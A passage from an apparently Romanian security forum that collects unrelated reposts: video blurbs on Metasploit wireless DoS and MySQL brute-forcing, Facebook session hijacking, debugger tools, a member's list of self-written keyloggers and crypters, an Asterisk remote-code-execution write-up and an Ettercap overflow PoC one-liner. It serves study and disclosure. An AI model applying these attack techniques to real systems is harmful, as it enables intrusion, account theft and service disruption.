major role in the skills development and training of the NetSPI network and application penetration testing team. Scott is an active participant in the information security community, regularly contributing technical security blog posts, whitepapers, and presenting at a wide variety of conferences. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: SQL Server Exploitation, Escalation and Pilfering - Antti Rantasaari and Scott Sutherland on Vimeo Sursa: Sql Server Exploitation, Escalation And Pilfering

Wireless Exploitation Using Metasploit Framework Description: In this video I will show you how to use Metasploit Auxiliary dos modules for wireless exploitations. Modules are not much effective but some modules are very effective like fuzzing became frame, flooding etc.. I will cover more auxiliary modules in the next video. I have used three modules. auxiliary/dos/wifi/fakeap This module can advertise thousands of fake access points, using random SSIDs and BSSID addresses. Inspired by Black Alchemy's fakeap tool. auxiliary/dos/wifi/deauth This module sends 802.11 DEAUTH requests to a specific wireless peer, using the specified source address and source BSSID. auxiliary/dos/wifi/ssidlist_beacon This module sends out beacon frames using SSID's identified in a specified file and randomly selected BSSID's. This is useful when combined with a Karmetasploit attack to get clients configured to not probe for networks in their PNL to start probing when they see a matching SSID in from this script. For a list of common SSID's to use with this script, check WiGLE - Wireless Geographic Logging Engine - SSID Stats. If a file of SSID's is not specified, a default list of 20 SSID's will be used. This script will run indefinitely until interrupted. Source : - Penetration Testing Software | Metasploit Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Wireless Exploitation Using Metasploit Framework

Unraveling Some Of The Mysteries Around Dom-Based Xss Description: Abstract DOM-based XSS was first revealed to the world back in 2005 by Amit Klien, when it was an interesting theoretical vulnerability. In 2012, with the push towards Web 2.0 well into the mainstream, DOM-based XSS has become a very commonly uncovered and exploited vulnerability, but it’s poorly understood. This talk will focus on the full range of issues around DOM-based XSS. It will start with a discussion of the technical details of the vulnerability, the true nature of the risk it introduces (both likelihood and impact), and some new terminology and updated definitions about what truly is a DOM-based XSS vulnerability as compared to the standard Stored and Reflected XSS that the community is well aware of. It will then discuss the difficulties that security analysts face when trying to find DOM-based XSS flaws, and provide recommended analysis techniques that help move DOM-based XSS discovery from an art towards more of a science. And finally, it will discuss simple techniques for avoiding DOM-based XSS issues in the first place as well as how to mitigate issues that are uncovered during a security review. ***** Speaker Dave Wichers, COO, Aspect Security Dave Wichers is a cofounder and the Chief Operating Officer (COO) of Aspect Security, a company that specializes in application security services. He is also a long time contributor to OWASP including being a member of the OWASP Board since it was formed in 2003. | Dave has over 20 years of experience in the information security field, and has focused exclusively on application security since 1998. At Aspect, in addition to his COO duties, he is Aspect's application security courseware… Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Unraveling Some of the Mysteries around DOM-Based XSS - Dave Wichers on Vimeo Sursa: Unraveling Some Of The Mysteries Around Dom-Based Xss

Daca tot discutam despre asa ceva, de ce nu postati si niste proiecte facute de voi? PHP: - VL Download CMS (script pentru descarcari) - Selenity CMS (un mic portal) - Site-ul "clasei" (mi-a iesit o grafica acceptabila) - Lucrarea de licenta a unui baiat Visual Basic 6: - Yahoo! Manager v1.2 - Digital Keylogger v3.0/4.0 - Royal Crypter v3.0 - Multe alte porcarii (IP locator si mai stiu eu ce...) C#: - Vreo 3 proiecte pentru munca C++: - DarkyBinder v2.0 (primul si singurul binder pentru Linux) - FileDownloader (WinAPI) - DataKiller (sterge tot ce apuca) - Chestii de liceu/facultate (liste inlantuite, clasa pentru BigInt si alte prostii) + Sunt programator C++ (Linux), deci am scris ceva linii de cod Aproximez undeva la 50.000 de linii de cod scrise in total (in toate limbajele pe care le cunosc, mai mult sau mai putin), ceea ce mi se pare cam putin, dar este timp.

Cam... MARE. Ma refer fizic. Cred ca are juma de kil...

Deci in ultimele 3 luni ai scris peste 10000 de linii de cod in 5 limbaje diferite?

Ce limbaje de programare CUNOSTI? Iar prin asta vreau sa zic "In ce limbaje de programare ai scris PESTE 2000 de linii de cod?" Ati putea si sa postati cand ati scris ultima linie de cod. Votati. Evitati caterinca.

HyperDbg HyperDbg is a kernel debugger that leverages hardware-assisted virtualization. More precisely, HyperDbg is based on a minimalistic hypervisor that is installed while the system runs. Compared to traditional kernel debuggers (e.g., WinDbg, SoftIce, Rasta R0 Debugger) HyperDbg is completely transparent to the kernel and can be used to debug kernel code without the need of serial (or USB) cables. For example, HyperDbg allows to single step the execution of the kernel, even when the kernel is executing exception and interrupt handlers. Compared to traditional virtual machine based debuggers (e.g., the VMware builtin debugger), HyperDbg does not require the kernel to be run as a guest of a virtual machine, although it is as powerful. Feel free to contact us for suggestions, criticisms, and bug reports through the HyperDbg google group: hyperdbg | Google Groups Further details about HyperDbg are available in the paper "Dynamic and Transparent Analysis of Commodity Production Systems" (published in the proceedings of ASE 2010). The paper can be downloaded here. Download: http://code.google.com/p/hyperdbg/

[h=1]Defrag Tools: #22 - WinDbg - Memory Kernel Mode[/h]By: Larry Larsen, Andrew Richards, Chad Beeder In this episode of Defrag Tools, Andrew Richards, Chad Beeder and Larry Larsen continue looking at the Debugging Tools for Windows (in particular WinDbg). WinDbg is a debugger that supports user mode debugging of a process, or kernel mode debugging of a computer. This installment goes over the commands used to show the memory used in a kernel mode debug session. We cover these commands: !vm !vm 1 !memusage 8 !poolused 2 !poolused 4 !poolfind <tag> !pool <addr> !pool <addr> 2 !pte Make sure you watch Defrag Tools Episode #1 for instructions on how to get the Debugging Tools for Windows and how to set the required environment variables for symbols and source code resolution. Resources: Microsoft Windows SDK for Windows 7 and .NET Framework 4 Sysinternals LiveKD Sysinternals RAMMap Timeline: [00:45] - Sysinternals LiveKD debug of the machine [01:47] - Virtual Memory summary (!vm 1) [05:10] - Sysinternals LiveKD live kernel dump (livekd.exe -m -o kernel.dmp) [09:30] - Sysinternals RAMMap [11:10] - Memory List summary (!memusage 8) [16:15] - Pool Usage by Non-Paged Pool (!poolused 2) [20:16] - Pool Tags (c:\debuggers\triage\pooltag.txt) [28:06] - Pool Usage by Paged Pool (!poolused 4) [29:27] - Pool issues lead to Bugchecks [34:00] - Find Pool by Address (!pool <addr>) [36:05] - Find Pool by Tag (!poolfind <tag>) [40:30] - Page Table Entry (PTE) and Page Frame Number (PFN) (!pte <addr>) [42:45] - Sometimes it is a physical hardware failure Video: Defrag Tools: #22 - WinDbg - Memory Kernel Mode | Defrag Tools | Channel 9

DoS? Then Who Was Phone? Introduction This post presents exploitation notes on a vulnerability we discovered in Asterisk, an open source telephony solution produced by Digium. We reported this bug to Digium on November 27th, 2012, and provided it to customers of the Exodus Intelligence Feed as EIP-2012-0008. Digium released the advisory AST-2012-014 for this vulnerability on January 2nd, 2013, which was picked up shortly after by some of the aggregator sites and incorrectly categorized as a denial-of-service; however, this bug is certainly exploitable. As we found it fun to analyze, and since discussions about server-side memory bugs are a little sparse now-a-days, we thought it would be cool to share for others who might also find it interesting. Vulnerability The vulnerability resides in the HTTP Asterisk Management Interface (AMI) service, and is the result of an alloca being used to “allocate” memory with a remotely-supplied, untrusted size value. The vulnerability is present in the Asterisk source code file main/http.c, specifically in the function ast_http_get_post_vars, which as the name would suggest is used to parse HTTP post variable data. A snip of the pertinent vulnerable code in this function is shown below: struct ast_variable *ast_http_get_post_vars( struct ast_tcptls_session_instance *ser, struct ast_variable *headers) { int content_length = 0; struct ast_variable *v, *post_vars=NULL, *prev = NULL; char *buf, *var, *val; for (v = headers; v; v = v->next) { if (!strcasecmp(v->name, "Content-Type")) { if (strcasecmp(v->value, "application/x-www-form-urlencoded")) { return NULL; } break; } } for (v = headers; v; v = v->next) { if (!strcasecmp(v->name, "Content-Length")) { content_length = atoi(v->value) + 1; break; } } if (!content_length) { return NULL; } if (!(buf = alloca(content_length))) { return NULL; } if (!fgets(buf, content_length, ser->f)) { return NULL; } The code shows the length value being converted from the Content-Length string using atoi, then incremented by one and stored in the content_length variable. Memory is obtained by alloca for the expected content length, and pointed to by *buf. Finally, fgets is called to read the expected amount of content data into this buffer. I found it interesting that the code looks as though it may have been written with memory management issues in mind, as the check to ensure content_length is not zero would catch an integer overflow caused by adding one to the value. Below is a snip of disassembled code for the vulnerable function as compiled in the Asterisk package shipped with Ubuntu. This snip shows the size value being set and used to subtract the stack pointer (ESP) to “allocate” stack memory: <ast_http_get_post_vars+187>: call <strtol@plt> <ast_http_get_post_vars+192>: mov edx,eax <ast_http_get_post_vars+194>: add edx,0x1 <ast_http_get_post_vars+197>: je <ast_http_get_post_vars+408> <ast_http_get_post_vars+203>: mov ecx,DWORD PTR [ebp-0x30] <ast_http_get_post_vars+206>: add eax,0x1f <ast_http_get_post_vars+209>: and eax,0xfffffff0 <ast_http_get_post_vars+212>: sub esp,eax <----- LOL <ast_http_get_post_vars+214>: lea esi,[esp+0x1b] As shown, the alloca is compiled into a simple set of instructions to ADD and AND-off the size to be allocated from the stack. It then subtracts the revised size from the stack pointer, and stores an address derived from this into the ESI register for further use. Exploitation Obstacles Since most compilers implement alloca as a fairly direct subtraction of the stack pointer, the exploitation of alloca is often as simple as providing a size value large enough to wrap the stack pointer around to a desirable location higher on the stack. Subsequent use of the pointer to store remotely supplied data would then result in stack memory corruption, and allow for vanilla exploitation techniques to gain control of program execution flow. However, here the vulnerable code uses the function fgets to read network data into the obtained memory space. This complicates the situation for exploitation as the libc implementation of fgets performs a check on its length argument to ensure that it is not beyond the signed integer boundary of 0x7FFFFFFF. If this check fails, fgets does not read data and returns an error. The code snip below shows the check performed inside of fgets as implemented in libc.6.so: <fgets+0>: sub esp,0x4c <fgets+3>: mov DWORD PTR [esp+0x48],ebp <fgets+7>: mov ebp,DWORD PTR [esp+0x54] <fgets+11>: mov DWORD PTR [esp+0x3c],ebx <fgets+15>: call <mov_esp_ebx> <fgets+20>: add ebx,0x14051c <fgets+26>: mov DWORD PTR [esp+0x40],esi <fgets+30>: mov esi,DWORD PTR [esp+0x58] <fgets+34>: test ebp,ebp <fgets+36>: mov DWORD PTR [esp+0x44],edi <fgets+36>: mov DWORD PTR [esp+0x44],edi <fgets+40>: jle <fgets+336> ... <fgets+336>: mov DWORD PTR [esp+0x50],0x0 <fgets+344>: jmp <fgets+256> ... <fgets+256>: mov eax,DWORD PTR [esp+0x50] <fgets+260>: mov ebx,DWORD PTR [esp+0x3c] <fgets+264>: mov esi,DWORD PTR [esp+0x40] <fgets+268>: mov edi,DWORD PTR [esp+0x44] <fgets+272>: mov ebp,DWORD PTR [esp+0x48] <fgets+276>: add esp,0x4c <fgets+279>: ret The EBP register, containing the length argument, is checked to be a positive signed value using the TEST and JLE instructions at <fgets+34> and <fgets+40>. If the check fails, the code jumps to return an error, making fgets unusable for exploiting a wrapped stack pointer to overwrite memory with data read from the network. While stack corruption by this means is still possible through the pushing and moving of data to the stack by other compiled code operations, the lack of control and limited set of operations make this approach undesirable. At this point some might categorize this vulnerability as purely theoretical or possibly even unexploitable. As I hope many readers would agree, a challenge of this nature is always inviting. The Exodus team loves goading and trolling one another in these scenarios, usually with something along the lines of “Yeah, it is probably too tough for you to exploit…” or “you should probably just give up.” The recipient of this pep talk usually proceeds to cry and reevaluate the code until an idea hits them or they decide to resign to a life of PCI compliance auditing. Challenge accepted. EIP Control After spending some time analyzing the problem and hating computers, I found a way to exploit this vulnerability. The HTTP listener for the Asterisk Management Interface handles every new connection by creating a new thread to execute a designated worker function to process the request. The code to setup and complete this task is spread out across multiple functions and macros and is a little messy, so we’ll try to keep details to a minimum. The HTTP AMI is started initially by a call chain of functions starting with ast_http_init, which calls __ast_http_load, which then calls ast_tcptls_server_start. The function ast_tcptls_server_start performs standard TCP socket setup operations, and is defined as: void ast_tcptls_server_start(struct ast_tcptls_session_args *desc) Despite the name, ast_tcptls_server_start is used for both TLS and non-TLS service setup. The single argument taken by this function is a structure describing aspects of the server to be started. From __ast_http_load, the call looks like: ast_tcptls_server_start(&http_desc); The structure structure http_desc is defined in main/http.c as: static struct ast_tcptls_session_args http_desc = { .accept_fd = -1, .master = AST_PTHREADT_NULL, .tls_cfg = NULL, .poll_timeout = -1, .name = "http server", .accept_fn = ast_tcptls_server_root, .worker_fn = httpd_helper_thread, }; The .accept_fn is a function pointer for a function to accept the connection, and the worker_fn is a pointer to the worker function responsible for processing the request once a new thread is created. After more setup code, a new thread is created to accept socket connections by calling the function ast_tcptls_server_root. For each TCP connection accepted on the listening HTTP port (default 8088), ast_tcptls_server_root calls the following thread creation wrapper to create a new thread and eventually call the worker function: ... if (ast_pthread_create_detached_background(&launched, NULL, handle_tcptls_connection, tcptls_session)) { ast_log(LOG_WARNING, "Unable to launch helper thread: %s\n", strerror(errno)); ast_tcptls_close_session_file(tcptls_session); ao2_ref(tcptls_session, -1); } ... The function ast_pthread_create_detached_background is a macro wrapper for the function ast_pthread_create_stack. The macro definition looks roughly like: ast_pthread_create_detached_stack(a, b, c, d, AST_BACKGROUND_STACKSIZE, ...) The important thing to note here is the argument AST_BACKGROUND_STACKSIZE. This is used by the function to set the new thread's stack size attribute before starting the thread: pthread_attr_setstacksize(attr, stacksize ? stacksize : AST_STACKSIZE) ... return pthread_create(thread, attr, start_routine, data); For builds without low memory restrictions defined, the AST_BACKGROUND_STACKSIZE and the AST_STACKSIZE macros are defined as: #define AST_BACKGROUND_STACKSIZE AST_STACKSIZE #define AST_STACKSIZE (((sizeof(void *) * 8 * 8) - 16) * 1024) /* becomes 0x3C000 */ The use of AST_STACKSIZE, or 0x3C000, to set the size of the stack for each new HTTP thread is significant, as it means the stack of the newly created thread will begin at 0x3C000 below the top of the previous thread's stack. In turn, if a value of this size or greater is used for alloca pointer subtraction, the resulting stack pointer will overlap with the stack memory of a newer thread. By carefully synchronizing the state of the threads involved so they do not collide their shared use of stack memory, it is possible to use this behavior to overwrite the contents of one thread's stack area with network data read by another thread. To visualize this, and because I love drawing stack diagrams, I present the following bad art: Synchronizing the two threads such that they do not collide and clobber each other's critical stack contents is as simple as not sending data when a given thread is expecting it. While one thread is waiting for data in a blocking read operation, the other thread may be using the stack. Using the HTTP POST method (as is required to trigger the vulnerability) allows for two separate network read operations per thread: one for the initial read of HTTP headers, and a second for reading the HTTP Content-Data. Having two individual network read operations per thread provides enough blocking opportunity to align the augmented stack pointer of the first thread to a desirable location used by the second thread. Better yet, this provides an opportunity to align the pointer of the first thread to a location that is not yet used by the second thread, but will be be used once the second thread completes its initial read and resumes execution. The following diagram steps attempt to illustrate this process, ignoring trivial details and using round numbers for simplicity. 1. Two socket connections to the HTTP AMI service are established, causing Asterisk to create two threads to handle the connections. Both threads are expecting HTTP headers and so they are both blocking on a read operation. To depict the state of these threads: 2. Thread1 is sent HTTP headers with an HTTP Content-Length string equivalent to 0x3C900. Once headers are received, Thread1's initial read operation finishes. It performs the alloca, subtracting its stack pointer by 0x3C900, which places its pointer for *buf at 0x900 bytes down from the top of Thread2's stack: 3. Thread1 is then sent approximately 0x700 bytes of the 0x3C900 it is expecting. This advances the *buf pointer index used by fgets up the stack, closer to Thread2's current stack pointer. Thread1 continues waiting as it has not yet received the full amount of data expected (0x3C900). 4. Thread2, still waiting on its initial network read, is sent HTTP POST headers with a Content-Length string equivalent to approximately 0x200, which it uses for its own alloca, subtracting from its stack pointer. Coordinating this length carefully places it precisely where the *buf pointer in Thread1 fgets currently points. Thread2 then calls fgets to receive its HTTP Content-Data, causing it to block while waiting to read in data. 5. Thread1 is sent 4 more bytes of the data it is waiting to receive, which is stored starting at its current *buf index in fgets, and overwrites where Thread2's stored return address is for fgets. A return from fgets can then be triggered by sending the remaining data expected, or a newline character, or also by simply closing the connection. Once Thread2 returns, EIP is restored from the overwritten return address value and execution flow is controlled. Protection Mechanisms Precisely overwriting only desired stack contents leaves stack canaries intact so that they do not interfere with exploitation. To avoid non-executable memory protections, typical return-oriented techniques may be employed to reuse existing executable memory once execution flow is controlled. This leaves Address Space Layout Randomization (ASLR), and more specifically, Asterisk builds compiled as Position-Independent-Executables (PIE) as the only remaining obstacle to overcome, as fixed return locations cannot be used in this case. While the default Makefile generated to compile Asterisk from source does not include flags for PIE, popular Linux distributions may package their own Asterisk built with PIE for extra security, such as with Ubuntu (props to @kees_cook for keeping us on our toes with this). ASLR via PIE significantly frustrates exploitation. Since Ubuntu is a popular distribution, and having set the bar for difficulty in this case, the Ubuntu Asterisk build is the target we challenged ourselves with. Who Was Phone I will save you from babble about entropy and efforts made to try and guess addresses in the presence of ASLR. Instead we will discuss how this vulnerability can be reliably exploited for memory disclosure, and used to determine the location of Asterisk code memory to redirect execution to. The function generic_http_callback in main/manager.c is the URL handling function executed when triggering the vulnerability, and is defined as: static int generic_http_callback(struct ast_tcptls_session_instance *ser, enum ast_http_method method, enum output_format format, struct sockaddr_in *remote_address, const char *uri, struct ast_variable *get_params, struct ast_variable *headers) { Above you can see the output_format argument format is an enumeration value for one of the possible formats used for the reply. Its expected possible values are 0, 1, or 2 for "plain", "html", "xml" respectively. This value is used to retrieve a pointer from a global array when constructing a response in generic_http_callback: /* ... */ ast_str_append(&http_header, 0, "Content-type: text/%s\r\n" "Cache-Control: no-cache;\r\n" "Set-Cookie: mansession_id=\"%08x\"; Version=1; Max-Age=%d\r\n" "Pragma: SuppressEvents\r\n", contenttype[format], session->managerid, httptimeout); /* ... */ ast_http_send(ser, method, 200, NULL, http_header, out, 0, 0); /* ... */ The contenttype array contains the pointers to the strings used for the HTTP response, and thus the pointer retrieved from this look-up directly influences data sent back to the HTTP user. By conducting the same style of stack pointer manipulation previously described, it is possible to align a thread's *buf pointer to overwrite the stack memory where format is stored, so it indexes beyond the contenttype array into other memory. With the help of some handy debugger scripting, I was able to find a pointer->pointer->code from a relative offset of contenttype. My code to do this with VDB is shown below. (Comments document the code a little bit, but a more extensive explanation of VDB is beyond the scope of this post): for m in trace.getMemoryMaps(): # check memory map name if m[3].lower() == "/usr/sbin/asterisk": # check for flags Read & Write for data segment if m[2] == 6: addr = m[0] memlen = m[1] memory = trace.readMemory(addr, memlen) # check for Execute flag elif m[2] == 5: # save beginning and ending of executable memory code = m[0] codestop = code+m[1] # from each offset in the memory for offset in range(memlen-4): # read for the size of a pointer ptr = struct.unpack("<I", memory[offset:offset+4])[0] # check if it is a pointer if ispoi(ptr): # read the value at the pointer ptr = struct.unpack("<I", trace.readMemory(ptr, 4))[0] # is that value in the asterisk code? if ptr > code and ptr < codestop: print " [*] Found 0x%08x -> 0x%08x" % (addr+offset, ptr) The script simply searches the memory maps of the attached process for the Asterisk data and code memory regions. Once they are found, the value at every possible offset in the data map is checked to be a valid memory address. Passing this check, the value at the memory it points to is then also checked to see if it is a pointer to code memory and then prints out valid matches. This script identified 8 locations of usable pointers when ran against Ubuntu's packaged Asterisk binary. By overwriting the saved format variable with an index to offset to one of these pointer sequences, it is possible to manufacture a remote memory disclosure and determine an address of Asterisk code memory. Putting this all together allows for successful remote arbitrary code execution despite ASLR/PIE/NX/STACK COOKIES/ALL_OF_THE_THINGS compiled in with the Ubuntu build. To add to an already silly amount of convenience with the conditions surrounding this bug, when gaining EIP control through the method described, the next value on the stack above the overwritten return address is a pointer to the buffer passed to fgets in the second thread. This buffer is populated with the second thread's received HTTP Content-Data (remotely-controlled data). Using the memory disclosure to calculate the address of a call to the function ast_safe_system, which takes a single string pointer argument to execute as a command line, it is simple to exploit the return in the second thread to execute arbitrary commands from the Asterisk process -- which often runs as root. Using this to spawn a remote shell with Ubuntu's default dash shell is a little obnoxious, but possible, and an exercise left up to the reader. Hope you enjoyed the post! -- Brandon Edwards @drraid Sursa: DoS? Then Who Was Phone?

[h=1]Ettercap <= 0.7.5.1 Stack Overflow Vulnerability[/h] Title: Ettercap Stack overflow (CWE-121) References: CVE-2012-0722 Discovered by: Sajjad Pourali Vendor: http://www.ettercap.sourceforge.net/ Vendor contact: 13-01-01 21:20 UTC (No response) Solution: Using the patch Patch: http://www.securation.com/files/2013/01/ec.patch Local: Yes Remote: No Impact: low Affected: - ettercap 0.7.5.1 - ettercap 0.7.5 - ettercap 0.7.4 and earlier Not affected: - ettercap 0.7.4.1 --- Trace vulnerable place: ./include/ec_inet.h:27-44 enum { NS_IN6ADDRSZ = 16, NS_INT16SZ = 2, ETH_ADDR_LEN = 6, TR_ADDR_LEN = 6, FDDI_ADDR_LEN = 6, MEDIA_ADDR_LEN = 6, IP_ADDR_LEN = 4, IP6_ADDR_LEN = 16, MAX_IP_ADDR_LEN = IP6_ADDR_LEN, ETH_ASCII_ADDR_LEN = sizeof("ff:ff:ff:ff:ff:ff")+1, IP_ASCII_ADDR_LEN = sizeof("255.255.255.255")+1, IP6_ASCII_ADDR_LEN = sizeof("ffff:ffff:ffff:ffff:ffff:ffff:255.255.255.255")+1, MAX_ASCII_ADDR_LEN = IP6_ASCII_ADDR_LEN, }; ./include/ec_resolv.h:42 #define MAX_HOSTNAME_LEN 64 ./src/ec_scan.c:610-614 char ip[MAX_ASCII_ADDR_LEN]; char mac[ETH_ASCII_ADDR_LEN]; char name[MAX_HOSTNAME_LEN]; ./src/ec_scan.c:633-635 if (fscanf(hf, "%s %s %s\n", ip, mac, name) != 3 || *ip == '#' || *mac == '#' || *name == '#') continue; --- PoC: sudo ruby -e'puts"a"*2000' > overflow && sudo ettercap -T -j overflow --- + Sajjad Pourali + http://www.securation.com + Contact: sajjad[at]securation.com Sursa: Ettercap <= 0.7.5.1 Stack Overflow Vulnerability

Hijacking Facebook Accounts Over A Network Description: In this video i show you how to Hijack facebook accounts over a network using with Ettercap, Wireshark, Grease Monkey and Cookie Injector. You will need the following stuff for this to work. Backtrack Linux - Pentesting Operating System Wireshark - Packet Analzyer comes with Backtrack 5 Firefox - Browser comes with Backtrack 5+ Grease Monkey - Firefox addon Cookie Injector - Script to Dump Wireshark Data. Links: Backtrack Linux Download: BackTrack Linux - Penetration Testing Distribution Passsniffer.sh from video: Script for sniffing passwords and data on lan/wlan using ettercap, sslstrip, urlsnarf Grease Monkey - Firefox addon: https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/ Cookie Injector for Grease Monkey: Original Cookie Injector for Greasemonkey Credits to tedbear for the Passsniffer.sh script. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Hijacking Facebook Accounts Over A Network

Using Interactive Static Analysis For Early Detection Of Software Vulnerabilities Description: Abstract We present our work of using interactive static analysis to improve upon static analysis techniques by introducing a new mixed-initiative paradigm for interacting with developers to aid in the detection and prevention of security vulnerabilities. The key difference between our approach and standard static analysis is interaction with the developers. Specifically, our approach is predicated on the following principles: • Secure programming support should be targeted towards general developers who understand the application logic, but may have limited knowledge of secure programming; • Secure programming support should be provided while the code is being developed, integrated into the development tools; • Secure programming support should reduce the workload in detecting and resolving vulnerabilities; and • Developers should be able to provide feedback about the application context that can drive customized security analysis. We have performed evaluations of our approach using an active open source project, Apache Roller. Our results shows that interactive data flow analysis can potential reduce the effort of finding and fixing vulnerabilities by as much as 50%. Using interactive control flow analysis, we found cross request forgery vulnerabilities in current Roller release. The Roller team issued patches based on our report (CVE-2012-2380). We have also performed user studies, both for students and for professional developers with promising results. For example, preliminary data suggests that using ASIDE students, who do not have secure programming training, can write much more secure code. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Using Interactive Static Analysis for Early Detection of Software Vulnerabilities - Bill Chu on Vimeo Sursa: Using Interactive Static Analysis For Early Detection Of Software Vulnerabilities

Brute-Force Attack On Mysql And Crack Mysql Hash Using Metasploit Description: In this video I will show you how to perform a brute - force attack on Mysql and how to use John the Ripper Hash Cracking module in Metasploit Framework. When you are using John the Ripper Module, so make sure that your database is connected to Metasploit Framework or you will get an error. Modules are used .. auxiliary/scanner/mysql/mysql_version Enumerates the version of MySQL servers auxiliary/scanner/mysql/mysql_login This module simply queries the MySQL instance for a specific user/pass (default is root with blank). auxiliary/scanner/mysql/mysql_hashdump This module extracts the usernames and encrypted password hashes from a MySQL server and stores them for later cracking. Source : - Penetration Testing Software | Metasploit Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Brute-Force Attack On Mysql And Crack Mysql Hash Using Metasploit